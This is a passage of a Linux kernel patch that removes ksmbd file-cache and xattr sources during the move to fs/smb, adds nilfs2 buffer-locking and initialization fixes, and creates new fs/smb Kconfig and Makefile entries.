+-static void ksmbd_inode_put(struct ksmbd_inode *ci)
+-{
+-	if (atomic_dec_and_test(&ci->m_count))
+-		ksmbd_inode_free(ci);
+-}
+-
+-int __init ksmbd_inode_hash_init(void)
+-{
+-	unsigned int loop;
+-	unsigned long numentries = 16384;
+-	unsigned long bucketsize = sizeof(struct hlist_head);
+-	unsigned long size;
+-
+-	inode_hash_shift = ilog2(numentries);
+-	inode_hash_mask = (1 << inode_hash_shift) - 1;
+-
+-	size = bucketsize << inode_hash_shift;
+-
+-	/* init master fp hash table */
+-	inode_hashtable = vmalloc(size);
+-	if (!inode_hashtable)
+-		return -ENOMEM;
+-
+-	for (loop = 0; loop < (1U << inode_hash_shift); loop++)
+-		INIT_HLIST_HEAD(&inode_hashtable[loop]);
+-	return 0;
+-}
+-
+-void ksmbd_release_inode_hash(void)
+-{
+-	vfree(inode_hashtable);
+-}
+-
+-static void __ksmbd_inode_close(struct ksmbd_file *fp)
+-{
+-	struct dentry *dir, *dentry;
+-	struct ksmbd_inode *ci = fp->f_ci;
+-	int err;
+-	struct file *filp;
+-
+-	filp = fp->filp;
+-	if (ksmbd_stream_fd(fp) && (ci->m_flags & S_DEL_ON_CLS_STREAM)) {
+-		ci->m_flags &= ~S_DEL_ON_CLS_STREAM;
+-		err = ksmbd_vfs_remove_xattr(file_mnt_user_ns(filp),
+-					     filp->f_path.dentry,
+-					     fp->stream.name);
+-		if (err)
+-			pr_err("remove xattr failed : %s\n",
+-			       fp->stream.name);
+-	}
+-
+-	if (atomic_dec_and_test(&ci->m_count)) {
+-		write_lock(&ci->m_lock);
+-		if (ci->m_flags & (S_DEL_ON_CLS | S_DEL_PENDING)) {
+-			dentry = filp->f_path.dentry;
+-			dir = dentry->d_parent;
+-			ci->m_flags &= ~(S_DEL_ON_CLS | S_DEL_PENDING);
+-			write_unlock(&ci->m_lock);
+-			ksmbd_vfs_unlink(file_mnt_user_ns(filp), dir, dentry);
+-			write_lock(&ci->m_lock);
+-		}
+-		write_unlock(&ci->m_lock);
+-
+-		ksmbd_inode_free(ci);
+-	}
+-}
+-
+-static void __ksmbd_remove_durable_fd(struct ksmbd_file *fp)
+-{
+-	if (!has_file_id(fp->persistent_id))
+-		return;
+-
+-	write_lock(&global_ft.lock);
+-	idr_remove(global_ft.idr, fp->persistent_id);
+-	write_unlock(&global_ft.lock);
+-}
+-
+-static void __ksmbd_remove_fd(struct ksmbd_file_table *ft, struct ksmbd_file *fp)
+-{
+-	if (!has_file_id(fp->volatile_id))
+-		return;
+-
+-	write_lock(&fp->f_ci->m_lock);
+-	list_del_init(&fp->node);
+-	write_unlock(&fp->f_ci->m_lock);
+-
+-	write_lock(&ft->lock);
+-	idr_remove(ft->idr, fp->volatile_id);
+-	write_unlock(&ft->lock);
+-}
+-
+-static void __ksmbd_close_fd(struct ksmbd_file_table *ft, struct ksmbd_file *fp)
+-{
+-	struct file *filp;
+-	struct ksmbd_lock *smb_lock, *tmp_lock;
+-
+-	fd_limit_close();
+-	__ksmbd_remove_durable_fd(fp);
+-	__ksmbd_remove_fd(ft, fp);
+-
+-	close_id_del_oplock(fp);
+-	filp = fp->filp;
+-
+-	__ksmbd_inode_close(fp);
+-	if (!IS_ERR_OR_NULL(filp))
+-		fput(filp);
+-
+-	/* because the reference count of fp is 0, it is guaranteed that
+-	 * there are not accesses to fp->lock_list.
+-	 */
+-	list_for_each_entry_safe(smb_lock, tmp_lock, &fp->lock_list, flist) {
+-		spin_lock(&fp->conn->llist_lock);
+-		list_del(&smb_lock->clist);
+-		spin_unlock(&fp->conn->llist_lock);
+-
+-		list_del(&smb_lock->flist);
+-		locks_free_lock(smb_lock->fl);
+-		kfree(smb_lock);
+-	}
+-
+-	if (ksmbd_stream_fd(fp))
+-		kfree(fp->stream.name);
+-	kmem_cache_free(filp_cache, fp);
+-}
+-
+-static struct ksmbd_file *ksmbd_fp_get(struct ksmbd_file *fp)
+-{
+-	if (!atomic_inc_not_zero(&fp->refcount))
+-		return NULL;
+-	return fp;
+-}
+-
+-static struct ksmbd_file *__ksmbd_lookup_fd(struct ksmbd_file_table *ft,
+-					    u64 id)
+-{
+-	struct ksmbd_file *fp;
+-
+-	if (!has_file_id(id))
+-		return NULL;
+-
+-	read_lock(&ft->lock);
+-	fp = idr_find(ft->idr, id);
+-	if (fp)
+-		fp = ksmbd_fp_get(fp);
+-	read_unlock(&ft->lock);
+-	return fp;
+-}
+-
+-static void __put_fd_final(struct ksmbd_work *work, struct ksmbd_file *fp)
+-{
+-	__ksmbd_close_fd(&work->sess->file_table, fp);
+-	atomic_dec(&work->conn->stats.open_files_count);
+-}
+-
+-static void set_close_state_blocked_works(struct ksmbd_file *fp)
+-{
+-	struct ksmbd_work *cancel_work;
+-
+-	spin_lock(&fp->f_lock);
+-	list_for_each_entry(cancel_work, &fp->blocked_works,
+-				 fp_entry) {
+-		cancel_work->state = KSMBD_WORK_CLOSED;
+-		cancel_work->cancel_fn(cancel_work->cancel_argv);
+-	}
+-	spin_unlock(&fp->f_lock);
+-}
+-
+-int ksmbd_close_fd(struct ksmbd_work *work, u64 id)
+-{
+-	struct ksmbd_file	*fp;
+-	struct ksmbd_file_table	*ft;
+-
+-	if (!has_file_id(id))
+-		return 0;
+-
+-	ft = &work->sess->file_table;
+-	read_lock(&ft->lock);
+-	fp = idr_find(ft->idr, id);
+-	if (fp) {
+-		set_close_state_blocked_works(fp);
+-
+-		if (!atomic_dec_and_test(&fp->refcount))
+-			fp = NULL;
+-	}
+-	read_unlock(&ft->lock);
+-
+-	if (!fp)
+-		return -EINVAL;
+-
+-	__put_fd_final(work, fp);
+-	return 0;
+-}
+-
+-void ksmbd_fd_put(struct ksmbd_work *work, struct ksmbd_file *fp)
+-{
+-	if (!fp)
+-		return;
+-
+-	if (!atomic_dec_and_test(&fp->refcount))
+-		return;
+-	__put_fd_final(work, fp);
+-}
+-
+-static bool __sanity_check(struct ksmbd_tree_connect *tcon, struct ksmbd_file *fp)
+-{
+-	if (!fp)
+-		return false;
+-	if (fp->tcon != tcon)
+-		return false;
+-	return true;
+-}
+-
+-struct ksmbd_file *ksmbd_lookup_foreign_fd(struct ksmbd_work *work, u64 id)
+-{
+-	return __ksmbd_lookup_fd(&work->sess->file_table, id);
+-}
+-
+-struct ksmbd_file *ksmbd_lookup_fd_fast(struct ksmbd_work *work, u64 id)
+-{
+-	struct ksmbd_file *fp = __ksmbd_lookup_fd(&work->sess->file_table, id);
+-
+-	if (__sanity_check(work->tcon, fp))
+-		return fp;
+-
+-	ksmbd_fd_put(work, fp);
+-	return NULL;
+-}
+-
+-struct ksmbd_file *ksmbd_lookup_fd_slow(struct ksmbd_work *work, u64 id,
+-					u64 pid)
+-{
+-	struct ksmbd_file *fp;
+-
+-	if (!has_file_id(id)) {
+-		id = work->compound_fid;
+-		pid = work->compound_pfid;
+-	}
+-
+-	fp = __ksmbd_lookup_fd(&work->sess->file_table, id);
+-	if (!__sanity_check(work->tcon, fp)) {
+-		ksmbd_fd_put(work, fp);
+-		return NULL;
+-	}
+-	if (fp->persistent_id != pid) {
+-		ksmbd_fd_put(work, fp);
+-		return NULL;
+-	}
+-	return fp;
+-}
+-
+-struct ksmbd_file *ksmbd_lookup_durable_fd(unsigned long long id)
+-{
+-	return __ksmbd_lookup_fd(&global_ft, id);
+-}
+-
+-struct ksmbd_file *ksmbd_lookup_fd_cguid(char *cguid)
+-{
+-	struct ksmbd_file	*fp = NULL;
+-	unsigned int		id;
+-
+-	read_lock(&global_ft.lock);
+-	idr_for_each_entry(global_ft.idr, fp, id) {
+-		if (!memcmp(fp->create_guid,
+-			    cguid,
+-			    SMB2_CREATE_GUID_SIZE)) {
+-			fp = ksmbd_fp_get(fp);
+-			break;
+-		}
+-	}
+-	read_unlock(&global_ft.lock);
+-
+-	return fp;
+-}
+-
+-struct ksmbd_file *ksmbd_lookup_fd_inode(struct inode *inode)
+-{
+-	struct ksmbd_file	*lfp;
+-	struct ksmbd_inode	*ci;
+-
+-	ci = ksmbd_inode_lookup_by_vfsinode(inode);
+-	if (!ci)
+-		return NULL;
+-
+-	read_lock(&ci->m_lock);
+-	list_for_each_entry(lfp, &ci->m_fp_list, node) {
+-		if (inode == file_inode(lfp->filp)) {
+-			atomic_dec(&ci->m_count);
+-			lfp = ksmbd_fp_get(lfp);
+-			read_unlock(&ci->m_lock);
+-			return lfp;
+-		}
+-	}
+-	atomic_dec(&ci->m_count);
+-	read_unlock(&ci->m_lock);
+-	return NULL;
+-}
+-
+-#define OPEN_ID_TYPE_VOLATILE_ID	(0)
+-#define OPEN_ID_TYPE_PERSISTENT_ID	(1)
+-
+-static void __open_id_set(struct ksmbd_file *fp, u64 id, int type)
+-{
+-	if (type == OPEN_ID_TYPE_VOLATILE_ID)
+-		fp->volatile_id = id;
+-	if (type == OPEN_ID_TYPE_PERSISTENT_ID)
+-		fp->persistent_id = id;
+-}
+-
+-static int __open_id(struct ksmbd_file_table *ft, struct ksmbd_file *fp,
+-		     int type)
+-{
+-	u64			id = 0;
+-	int			ret;
+-
+-	if (type == OPEN_ID_TYPE_VOLATILE_ID && fd_limit_depleted()) {
+-		__open_id_set(fp, KSMBD_NO_FID, type);
+-		return -EMFILE;
+-	}
+-
+-	idr_preload(GFP_KERNEL);
+-	write_lock(&ft->lock);
+-	ret = idr_alloc_cyclic(ft->idr, fp, 0, INT_MAX - 1, GFP_NOWAIT);
+-	if (ret >= 0) {
+-		id = ret;
+-		ret = 0;
+-	} else {
+-		id = KSMBD_NO_FID;
+-		fd_limit_close();
+-	}
+-
+-	__open_id_set(fp, id, type);
+-	write_unlock(&ft->lock);
+-	idr_preload_end();
+-	return ret;
+-}
+-
+-unsigned int ksmbd_open_durable_fd(struct ksmbd_file *fp)
+-{
+-	__open_id(&global_ft, fp, OPEN_ID_TYPE_PERSISTENT_ID);
+-	return fp->persistent_id;
+-}
+-
+-struct ksmbd_file *ksmbd_open_fd(struct ksmbd_work *work, struct file *filp)
+-{
+-	struct ksmbd_file *fp;
+-	int ret;
+-
+-	fp = kmem_cache_zalloc(filp_cache, GFP_KERNEL);
+-	if (!fp) {
+-		pr_err("Failed to allocate memory\n");
+-		return ERR_PTR(-ENOMEM);
+-	}
+-
+-	INIT_LIST_HEAD(&fp->blocked_works);
+-	INIT_LIST_HEAD(&fp->node);
+-	INIT_LIST_HEAD(&fp->lock_list);
+-	spin_lock_init(&fp->f_lock);
+-	atomic_set(&fp->refcount, 1);
+-
+-	fp->filp		= filp;
+-	fp->conn		= work->conn;
+-	fp->tcon		= work->tcon;
+-	fp->volatile_id		= KSMBD_NO_FID;
+-	fp->persistent_id	= KSMBD_NO_FID;
+-	fp->f_ci		= ksmbd_inode_get(fp);
+-
+-	if (!fp->f_ci) {
+-		ret = -ENOMEM;
+-		goto err_out;
+-	}
+-
+-	ret = __open_id(&work->sess->file_table, fp, OPEN_ID_TYPE_VOLATILE_ID);
+-	if (ret) {
+-		ksmbd_inode_put(fp->f_ci);
+-		goto err_out;
+-	}
+-
+-	atomic_inc(&work->conn->stats.open_files_count);
+-	return fp;
+-
+-err_out:
+-	kmem_cache_free(filp_cache, fp);
+-	return ERR_PTR(ret);
+-}
+-
+-static int
+-__close_file_table_ids(struct ksmbd_file_table *ft,
+-		       struct ksmbd_tree_connect *tcon,
+-		       bool (*skip)(struct ksmbd_tree_connect *tcon,
+-				    struct ksmbd_file *fp))
+-{
+-	unsigned int			id;
+-	struct ksmbd_file		*fp;
+-	int				num = 0;
+-
+-	idr_for_each_entry(ft->idr, fp, id) {
+-		if (skip(tcon, fp))
+-			continue;
+-
+-		set_close_state_blocked_works(fp);
+-
+-		if (!atomic_dec_and_test(&fp->refcount))
+-			continue;
+-		__ksmbd_close_fd(ft, fp);
+-		num++;
+-	}
+-	return num;
+-}
+-
+-static bool tree_conn_fd_check(struct ksmbd_tree_connect *tcon,
+-			       struct ksmbd_file *fp)
+-{
+-	return fp->tcon != tcon;
+-}
+-
+-static bool session_fd_check(struct ksmbd_tree_connect *tcon,
+-			     struct ksmbd_file *fp)
+-{
+-	return false;
+-}
+-
+-void ksmbd_close_tree_conn_fds(struct ksmbd_work *work)
+-{
+-	int num = __close_file_table_ids(&work->sess->file_table,
+-					 work->tcon,
+-					 tree_conn_fd_check);
+-
+-	atomic_sub(num, &work->conn->stats.open_files_count);
+-}
+-
+-void ksmbd_close_session_fds(struct ksmbd_work *work)
+-{
+-	int num = __close_file_table_ids(&work->sess->file_table,
+-					 work->tcon,
+-					 session_fd_check);
+-
+-	atomic_sub(num, &work->conn->stats.open_files_count);
+-}
+-
+-int ksmbd_init_global_file_table(void)
+-{
+-	return ksmbd_init_file_table(&global_ft);
+-}
+-
+-void ksmbd_free_global_file_table(void)
+-{
+-	struct ksmbd_file	*fp = NULL;
+-	unsigned int		id;
+-
+-	idr_for_each_entry(global_ft.idr, fp, id) {
+-		__ksmbd_remove_durable_fd(fp);
+-		kmem_cache_free(filp_cache, fp);
+-	}
+-
+-	ksmbd_destroy_file_table(&global_ft);
+-}
+-
+-int ksmbd_init_file_table(struct ksmbd_file_table *ft)
+-{
+-	ft->idr = kzalloc(sizeof(struct idr), GFP_KERNEL);
+-	if (!ft->idr)
+-		return -ENOMEM;
+-
+-	idr_init(ft->idr);
+-	rwlock_init(&ft->lock);
+-	return 0;
+-}
+-
+-void ksmbd_destroy_file_table(struct ksmbd_file_table *ft)
+-{
+-	if (!ft->idr)
+-		return;
+-
+-	__close_file_table_ids(ft, NULL, session_fd_check);
+-	idr_destroy(ft->idr);
+-	kfree(ft->idr);
+-	ft->idr = NULL;
+-}
+-
+-int ksmbd_init_file_cache(void)
+-{
+-	filp_cache = kmem_cache_create("ksmbd_file_cache",
+-				       sizeof(struct ksmbd_file), 0,
+-				       SLAB_HWCACHE_ALIGN, NULL);
+-	if (!filp_cache)
+-		goto out;
+-
+-	return 0;
+-
+-out:
+-	pr_err("failed to allocate file cache\n");
+-	return -ENOMEM;
+-}
+-
+-void ksmbd_exit_file_cache(void)
+-{
+-	kmem_cache_destroy(filp_cache);
+-}
+diff --git a/fs/ksmbd/vfs_cache.h b/fs/ksmbd/vfs_cache.h
+deleted file mode 100644
+index fcb13413fa8d9..0000000000000
+--- a/fs/ksmbd/vfs_cache.h
++++ /dev/null
+@@ -1,166 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0-or-later */
+-/*
+- *   Copyright (C) 2019 Samsung Electronics Co., Ltd.
+- */
+-
+-#ifndef __VFS_CACHE_H__
+-#define __VFS_CACHE_H__
+-
+-#include <linux/file.h>
+-#include <linux/fs.h>
+-#include <linux/rwsem.h>
+-#include <linux/spinlock.h>
+-#include <linux/idr.h>
+-#include <linux/workqueue.h>
+-
+-#include "vfs.h"
+-
+-/* Windows style file permissions for extended response */
+-#define	FILE_GENERIC_ALL	0x1F01FF
+-#define	FILE_GENERIC_READ	0x120089
+-#define	FILE_GENERIC_WRITE	0x120116
+-#define	FILE_GENERIC_EXECUTE	0X1200a0
+-
+-#define KSMBD_START_FID		0
+-#define KSMBD_NO_FID		(INT_MAX)
+-#define SMB2_NO_FID		(0xFFFFFFFFFFFFFFFFULL)
+-
+-struct ksmbd_conn;
+-struct ksmbd_session;
+-
+-struct ksmbd_lock {
+-	struct file_lock *fl;
+-	struct list_head clist;
+-	struct list_head flist;
+-	struct list_head llist;
+-	unsigned int flags;
+-	int cmd;
+-	int zero_len;
+-	unsigned long long start;
+-	unsigned long long end;
+-};
+-
+-struct stream {
+-	char *name;
+-	ssize_t size;
+-};
+-
+-struct ksmbd_inode {
+-	rwlock_t			m_lock;
+-	atomic_t			m_count;
+-	atomic_t			op_count;
+-	/* opinfo count for streams */
+-	atomic_t			sop_count;
+-	struct inode			*m_inode;
+-	unsigned int			m_flags;
+-	struct hlist_node		m_hash;
+-	struct list_head		m_fp_list;
+-	struct list_head		m_op_list;
+-	struct oplock_info		*m_opinfo;
+-	__le32				m_fattr;
+-};
+-
+-struct ksmbd_file {
+-	struct file			*filp;
+-	u64				persistent_id;
+-	u64				volatile_id;
+-
+-	spinlock_t			f_lock;
+-
+-	struct ksmbd_inode		*f_ci;
+-	struct ksmbd_inode		*f_parent_ci;
+-	struct oplock_info __rcu	*f_opinfo;
+-	struct ksmbd_conn		*conn;
+-	struct ksmbd_tree_connect	*tcon;
+-
+-	atomic_t			refcount;
+-	__le32				daccess;
+-	__le32				saccess;
+-	__le32				coption;
+-	__le32				cdoption;
+-	__u64				create_time;
+-	__u64				itime;
+-
+-	bool				is_nt_open;
+-	bool				attrib_only;
+-
+-	char				client_guid[16];
+-	char				create_guid[16];
+-	char				app_instance_id[16];
+-
+-	struct stream			stream;
+-	struct list_head		node;
+-	struct list_head		blocked_works;
+-	struct list_head		lock_list;
+-
+-	int				durable_timeout;
+-
+-	/* if ls is happening on directory, below is valid*/
+-	struct ksmbd_readdir_data	readdir_data;
+-	int				dot_dotdot[2];
+-};
+-
+-static inline void set_ctx_actor(struct dir_context *ctx,
+-				 filldir_t actor)
+-{
+-	ctx->actor = actor;
+-}
+-
+-#define KSMBD_NR_OPEN_DEFAULT BITS_PER_LONG
+-
+-struct ksmbd_file_table {
+-	rwlock_t		lock;
+-	struct idr		*idr;
+-};
+-
+-static inline bool has_file_id(u64 id)
+-{
+-	return id < KSMBD_NO_FID;
+-}
+-
+-static inline bool ksmbd_stream_fd(struct ksmbd_file *fp)
+-{
+-	return fp->stream.name != NULL;
+-}
+-
+-int ksmbd_init_file_table(struct ksmbd_file_table *ft);
+-void ksmbd_destroy_file_table(struct ksmbd_file_table *ft);
+-int ksmbd_close_fd(struct ksmbd_work *work, u64 id);
+-struct ksmbd_file *ksmbd_lookup_fd_fast(struct ksmbd_work *work, u64 id);
+-struct ksmbd_file *ksmbd_lookup_foreign_fd(struct ksmbd_work *work, u64 id);
+-struct ksmbd_file *ksmbd_lookup_fd_slow(struct ksmbd_work *work, u64 id,
+-					u64 pid);
+-void ksmbd_fd_put(struct ksmbd_work *work, struct ksmbd_file *fp);
+-struct ksmbd_file *ksmbd_lookup_durable_fd(unsigned long long id);
+-struct ksmbd_file *ksmbd_lookup_fd_cguid(char *cguid);
+-struct ksmbd_file *ksmbd_lookup_fd_inode(struct inode *inode);
+-unsigned int ksmbd_open_durable_fd(struct ksmbd_file *fp);
+-struct ksmbd_file *ksmbd_open_fd(struct ksmbd_work *work, struct file *filp);
+-void ksmbd_close_tree_conn_fds(struct ksmbd_work *work);
+-void ksmbd_close_session_fds(struct ksmbd_work *work);
+-int ksmbd_close_inode_fds(struct ksmbd_work *work, struct inode *inode);
+-int ksmbd_init_global_file_table(void);
+-void ksmbd_free_global_file_table(void);
+-void ksmbd_set_fd_limit(unsigned long limit);
+-
+-/*
+- * INODE hash
+- */
+-int __init ksmbd_inode_hash_init(void);
+-void ksmbd_release_inode_hash(void);
+-
+-enum KSMBD_INODE_STATUS {
+-	KSMBD_INODE_STATUS_OK,
+-	KSMBD_INODE_STATUS_UNKNOWN,
+-	KSMBD_INODE_STATUS_PENDING_DELETE,
+-};
+-
+-int ksmbd_query_inode_status(struct inode *inode);
+-bool ksmbd_inode_pending_delete(struct ksmbd_file *fp);
+-void ksmbd_set_inode_pending_delete(struct ksmbd_file *fp);
+-void ksmbd_clear_inode_pending_delete(struct ksmbd_file *fp);
+-void ksmbd_fd_set_delete_on_close(struct ksmbd_file *fp,
+-				  int file_info);
+-int ksmbd_init_file_cache(void);
+-void ksmbd_exit_file_cache(void);
+-#endif /* __VFS_CACHE_H__ */
+diff --git a/fs/ksmbd/xattr.h b/fs/ksmbd/xattr.h
+deleted file mode 100644
+index 16499ca5c82d3..0000000000000
+--- a/fs/ksmbd/xattr.h
++++ /dev/null
+@@ -1,122 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0-or-later */
+-/*
+- *   Copyright (C) 2021 Samsung Electronics Co., Ltd.
+- */
+-
+-#ifndef __XATTR_H__
+-#define __XATTR_H__
+-
+-/*
+- * These are on-disk structures to store additional metadata into xattr to
+- * reproduce windows filesystem semantics. And they are encoded with NDR to
+- * compatible with samba's xattr meta format. The compatibility with samba
+- * is important because it can lose the information(file attribute,
+- * creation time, acls) about the existing files when switching between
+- * ksmbd and samba.
+- */
+-
+-/*
+- * Dos attribute flags used for what variable is valid.
+- */
+-enum {
+-	XATTR_DOSINFO_ATTRIB		= 0x00000001,
+-	XATTR_DOSINFO_EA_SIZE		= 0x00000002,
+-	XATTR_DOSINFO_SIZE		= 0x00000004,
+-	XATTR_DOSINFO_ALLOC_SIZE	= 0x00000008,
+-	XATTR_DOSINFO_CREATE_TIME	= 0x00000010,
+-	XATTR_DOSINFO_CHANGE_TIME	= 0x00000020,
+-	XATTR_DOSINFO_ITIME		= 0x00000040
+-};
+-
+-/*
+- * Dos attribute structure which is compatible with samba's one.
+- * Storing it into the xattr named "DOSATTRIB" separately from inode
+- * allows ksmbd to faithfully reproduce windows filesystem semantics
+- * on top of a POSIX filesystem.
+- */
+-struct xattr_dos_attrib {
+-	__u16	version;	/* version 3 or version 4 */
+-	__u32	flags;		/* valid flags */
+-	__u32	attr;		/* Dos attribute */
+-	__u32	ea_size;	/* EA size */
+-	__u64	size;
+-	__u64	alloc_size;
+-	__u64	create_time;	/* File creation time */
+-	__u64	change_time;	/* File change time */
+-	__u64	itime;		/* Invented/Initial time */
+-};
+-
+-/*
+- * Enumeration is used for computing posix acl hash.
+- */
+-enum {
+-	SMB_ACL_TAG_INVALID = 0,
+-	SMB_ACL_USER,
+-	SMB_ACL_USER_OBJ,
+-	SMB_ACL_GROUP,
+-	SMB_ACL_GROUP_OBJ,
+-	SMB_ACL_OTHER,
+-	SMB_ACL_MASK
+-};
+-
+-#define SMB_ACL_READ			4
+-#define SMB_ACL_WRITE			2
+-#define SMB_ACL_EXECUTE			1
+-
+-struct xattr_acl_entry {
+-	int type;
+-	uid_t uid;
+-	gid_t gid;
+-	mode_t perm;
+-};
+-
+-/*
+- * xattr_smb_acl structure is used for computing posix acl hash.
+- */
+-struct xattr_smb_acl {
+-	int count;
+-	int next;
+-	struct xattr_acl_entry entries[];
+-};
+-
+-/* 64bytes hash in xattr_ntacl is computed with sha256 */
+-#define XATTR_SD_HASH_TYPE_SHA256	0x1
+-#define XATTR_SD_HASH_SIZE		64
+-
+-/*
+- * xattr_ntacl is used for storing ntacl and hashes.
+- * Hash is used for checking valid posix acl and ntacl in xattr.
+- */
+-struct xattr_ntacl {
+-	__u16	version; /* version 4*/
+-	void	*sd_buf;
+-	__u32	sd_size;
+-	__u16	hash_type; /* hash type */
+-	__u8	desc[10]; /* posix_acl description */
+-	__u16	desc_len;
+-	__u64	current_time;
+-	__u8	hash[XATTR_SD_HASH_SIZE]; /* 64bytes hash for ntacl */
+-	__u8	posix_acl_hash[XATTR_SD_HASH_SIZE]; /* 64bytes hash for posix acl */
+-};
+-
+-/* DOS ATTRIBUITE XATTR PREFIX */
+-#define DOS_ATTRIBUTE_PREFIX		"DOSATTRIB"
+-#define DOS_ATTRIBUTE_PREFIX_LEN	(sizeof(DOS_ATTRIBUTE_PREFIX) - 1)
+-#define XATTR_NAME_DOS_ATTRIBUTE	(XATTR_USER_PREFIX DOS_ATTRIBUTE_PREFIX)
+-#define XATTR_NAME_DOS_ATTRIBUTE_LEN	\
+-		(sizeof(XATTR_USER_PREFIX DOS_ATTRIBUTE_PREFIX) - 1)
+-
+-/* STREAM XATTR PREFIX */
+-#define STREAM_PREFIX			"DosStream."
+-#define STREAM_PREFIX_LEN		(sizeof(STREAM_PREFIX) - 1)
+-#define XATTR_NAME_STREAM		(XATTR_USER_PREFIX STREAM_PREFIX)
+-#define XATTR_NAME_STREAM_LEN		(sizeof(XATTR_NAME_STREAM) - 1)
+-
+-/* SECURITY DESCRIPTOR(NTACL) XATTR PREFIX */
+-#define SD_PREFIX			"NTACL"
+-#define SD_PREFIX_LEN	(sizeof(SD_PREFIX) - 1)
+-#define XATTR_NAME_SD	(XATTR_SECURITY_PREFIX SD_PREFIX)
+-#define XATTR_NAME_SD_LEN	\
+-		(sizeof(XATTR_SECURITY_PREFIX SD_PREFIX) - 1)
+-
+-#endif /* __XATTR_H__ */
+diff --git a/fs/nilfs2/page.c b/fs/nilfs2/page.c
+index 39b7eea2642a0..7d31833e68d1f 100644
+--- a/fs/nilfs2/page.c
++++ b/fs/nilfs2/page.c
+@@ -369,7 +369,15 @@ void nilfs_clear_dirty_pages(struct address_space *mapping, bool silent)
+ 			struct page *page = pvec.pages[i];
+ 
+ 			lock_page(page);
+-			nilfs_clear_dirty_page(page, silent);
++
++			/*
++			 * This page may have been removed from the address
++			 * space by truncation or invalidation when the lock
++			 * was acquired.  Skip processing in that case.
++			 */
++			if (likely(page->mapping == mapping))
++				nilfs_clear_dirty_page(page, silent);
++
+ 			unlock_page(page);
+ 		}
+ 		pagevec_release(&pvec);
+diff --git a/fs/nilfs2/segbuf.c b/fs/nilfs2/segbuf.c
+index 1362ccb64ec7d..6e59dc19a7324 100644
+--- a/fs/nilfs2/segbuf.c
++++ b/fs/nilfs2/segbuf.c
+@@ -101,6 +101,12 @@ int nilfs_segbuf_extend_segsum(struct nilfs_segment_buffer *segbuf)
+ 	if (unlikely(!bh))
+ 		return -ENOMEM;
+ 
++	lock_buffer(bh);
++	if (!buffer_uptodate(bh)) {
++		memset(bh->b_data, 0, bh->b_size);
++		set_buffer_uptodate(bh);
++	}
++	unlock_buffer(bh);
+ 	nilfs_segbuf_add_segsum_buffer(segbuf, bh);
+ 	return 0;
+ }
+diff --git a/fs/nilfs2/segment.c b/fs/nilfs2/segment.c
+index 209e46431a5ea..6cf64023be31e 100644
+--- a/fs/nilfs2/segment.c
++++ b/fs/nilfs2/segment.c
+@@ -979,10 +979,13 @@ static void nilfs_segctor_fill_in_super_root(struct nilfs_sc_info *sci,
+ 	unsigned int isz, srsz;
+ 
+ 	bh_sr = NILFS_LAST_SEGBUF(&sci->sc_segbufs)->sb_super_root;
++
++	lock_buffer(bh_sr);
+ 	raw_sr = (struct nilfs_super_root *)bh_sr->b_data;
+ 	isz = nilfs->ns_inode_size;
+ 	srsz = NILFS_SR_BYTES(isz);
+ 
++	raw_sr->sr_sum = 0;  /* Ensure initialization within this update */
+ 	raw_sr->sr_bytes = cpu_to_le16(srsz);
+ 	raw_sr->sr_nongc_ctime
+ 		= cpu_to_le64(nilfs_doing_gc() ?
+@@ -996,6 +999,8 @@ static void nilfs_segctor_fill_in_super_root(struct nilfs_sc_info *sci,
+ 	nilfs_write_inode_common(nilfs->ns_sufile, (void *)raw_sr +
+ 				 NILFS_SR_SUFILE_OFFSET(isz), 1);
+ 	memset((void *)raw_sr + srsz, 0, nilfs->ns_blocksize - srsz);
++	set_buffer_uptodate(bh_sr);
++	unlock_buffer(bh_sr);
+ }
+ 
+ static void nilfs_redirty_inodes(struct list_head *head)
+@@ -1778,6 +1783,7 @@ static void nilfs_abort_logs(struct list_head *logs, int err)
+ 	list_for_each_entry(segbuf, logs, sb_list) {
+ 		list_for_each_entry(bh, &segbuf->sb_segsum_buffers,
+ 				    b_assoc_buffers) {
++			clear_buffer_uptodate(bh);
+ 			if (bh->b_page != bd_page) {
+ 				if (bd_page)
+ 					end_page_writeback(bd_page);
+@@ -1789,6 +1795,7 @@ static void nilfs_abort_logs(struct list_head *logs, int err)
+ 				    b_assoc_buffers) {
+ 			clear_buffer_async_write(bh);
+ 			if (bh == segbuf->sb_super_root) {
++				clear_buffer_uptodate(bh);
+ 				if (bh->b_page != bd_page) {
+ 					end_page_writeback(bd_page);
+ 					bd_page = bh->b_page;
+diff --git a/fs/nilfs2/super.c b/fs/nilfs2/super.c
+index 77f1e5778d1c8..9ba4933087af0 100644
+--- a/fs/nilfs2/super.c
++++ b/fs/nilfs2/super.c
+@@ -372,10 +372,31 @@ static int nilfs_move_2nd_super(struct super_block *sb, loff_t sb2off)
+ 		goto out;
+ 	}
+ 	nsbp = (void *)nsbh->b_data + offset;
+-	memset(nsbp, 0, nilfs->ns_blocksize);
+ 
++	lock_buffer(nsbh);
+ 	if (sb2i >= 0) {
++		/*
++		 * The position of the second superblock only changes by 4KiB,
++		 * which is larger than the maximum superblock data size
++		 * (= 1KiB), so there is no need to use memmove() to allow
++		 * overlap between source and destination.
++		 */
+ 		memcpy(nsbp, nilfs->ns_sbp[sb2i], nilfs->ns_sbsize);
++
++		/*
++		 * Zero fill after copy to avoid overwriting in case of move
++		 * within the same block.
++		 */
++		memset(nsbh->b_data, 0, offset);
++		memset((void *)nsbp + nilfs->ns_sbsize, 0,
++		       nsbh->b_size - offset - nilfs->ns_sbsize);
++	} else {
++		memset(nsbh->b_data, 0, nsbh->b_size);
++	}
++	set_buffer_uptodate(nsbh);
++	unlock_buffer(nsbh);
++
++	if (sb2i >= 0) {
+ 		brelse(nilfs->ns_sbh[sb2i]);
+ 		nilfs->ns_sbh[sb2i] = nsbh;
+ 		nilfs->ns_sbp[sb2i] = nsbp;
+diff --git a/fs/smb/Kconfig b/fs/smb/Kconfig
+new file mode 100644
+index 0000000000000..ef425789fa6ad
+--- /dev/null
++++ b/fs/smb/Kconfig
+@@ -0,0 +1,11 @@
++# SPDX-License-Identifier: GPL-2.0-only
++#
++# smbfs configuration
++
++source "fs/smb/client/Kconfig"
++source "fs/smb/server/Kconfig"
++
++config SMBFS
++	tristate
++	default y if CIFS=y || SMB_SERVER=y
++	default m if CIFS=m || SMB_SERVER=m
+diff --git a/fs/smb/Makefile b/fs/smb/Makefile
+new file mode 100644
+index 0000000000000..9a1bf59a1a651
+--- /dev/null
++++ b/fs/smb/Makefile
+@@ -0,0 +1,5 @@
++# SPDX-License-Identifier: GPL-2.0
++
++obj-$(CONFIG_SMBFS)		+= common/
